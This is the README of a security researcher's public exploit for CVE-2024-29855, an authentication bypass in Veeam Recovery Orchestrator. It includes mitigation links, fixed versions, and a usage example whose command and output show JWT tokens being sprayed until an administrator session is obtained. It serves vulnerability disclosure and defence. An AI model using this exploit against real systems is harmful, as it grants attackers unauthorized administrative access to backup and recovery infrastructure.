# CVE-2024-29855
Veeam Recovery Orchestrator Authentication Bypass ([CVE-2024-29855](https://www.veeam.com/kb4585)) by [Sina Kheirkhah (@SinSinology)](https://x.com/SinSinology) of [SummoningTeam (@SummoningTeam)](https://x.com/summoningteam)

## Technical Analysis
[A root cause analysis of the vulnerability can be found on my blog
](https://summoning.team/blog/veeam-recovery-Orchestrator-auth-bypass-CVE-2024-29855/
)


![poc](poc.gif)


## Summary

Veeam published a [CVSS 9](https://www.veeam.com/kb4585) advisory for a [authentication bypass vulnerability CVE-2024-29855](https://www.veeam.com/kb4585) affecting [Veeam Recovery Orchestrator](https://www.veeam.com/disaster-recovery-orchestrator.html), Following is my full analysis and exploit for this issue, although the issue is not as severe as it might sound (DO NOT PANIC AT ALL) but i found the mechanics of this vulnerability a bit interesting and decided to publish my detailed analysis and exploit for it.

<p align="center">
  <img src="/poc.jpg" />
</p>

# Vulnerable versions?

According to Veeam [official advisory](https://www.veeam.com/kb4585), The vulnerability discussed was resolved starting in:

Veeam Recovery Orchestrator 7.1.0.230
Veeam Recovery Orchestrator 7.0.0.379

## Usage



```
python CVE-2024-29855.py  --start_time 1718264404 --end_time 1718264652 --username administrator@evilcorp.local --target https://192.168.253.180:9898/

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |
                                                                                    
        (*) Veeam Recovery Orchestrator Authentication Bypass (CVE-2024-29855) 
        
        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
        
        (*) Technical details: https://summoning.team/blog/veeam-recovery-Orchestrator-auth-bypass-CVE-2024-29855/
        
        
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(INFO) Spraying JWT Tokens: 401
(+) Pwned Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.gpvNsv78cZRt6qelKMIzprAQG_Eva6pKyNLLGIrnXkA, Status code: 200
(+) Response: {"user":"administrator@evilcorp.local","siteName":null,"siteRole":"Unknown","isLogged":true,"formats":{"shortTime":"H:i","longTime":"H:i:s","shortDate":"m/d/Y","shortTimeHR":"HH:mm","longTimeHR":"HH:mm:ss","shortDateHR":"MM/dd/yyyy","firstDayOfWeek":"Sunday"},"roles":["SiteSetupOperator"],"siteScopeRoles":[{"id":"00000000-0000-0000-0000-000000000000","name":"All Scopes","roles":[]}],"displayUserName":"EVILCORP\\Administrator","uiTimeout":3600,"dnsName":"WIN-I61UGP29579.evilcorp.local","domainName":"evilcorp.local"}
                                                                        
```

## Mitigations
Update to the latest version or mitigate by following the instructions within the Veeam Advisory
* https://www.veeam.com/kb4585

## Follow Us on Twitter for the latest security research:
*  [SinSinology](https://x.com/SinSinology)
*  [SummoningTeam](https://x.com/SummoningTeam)

## Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

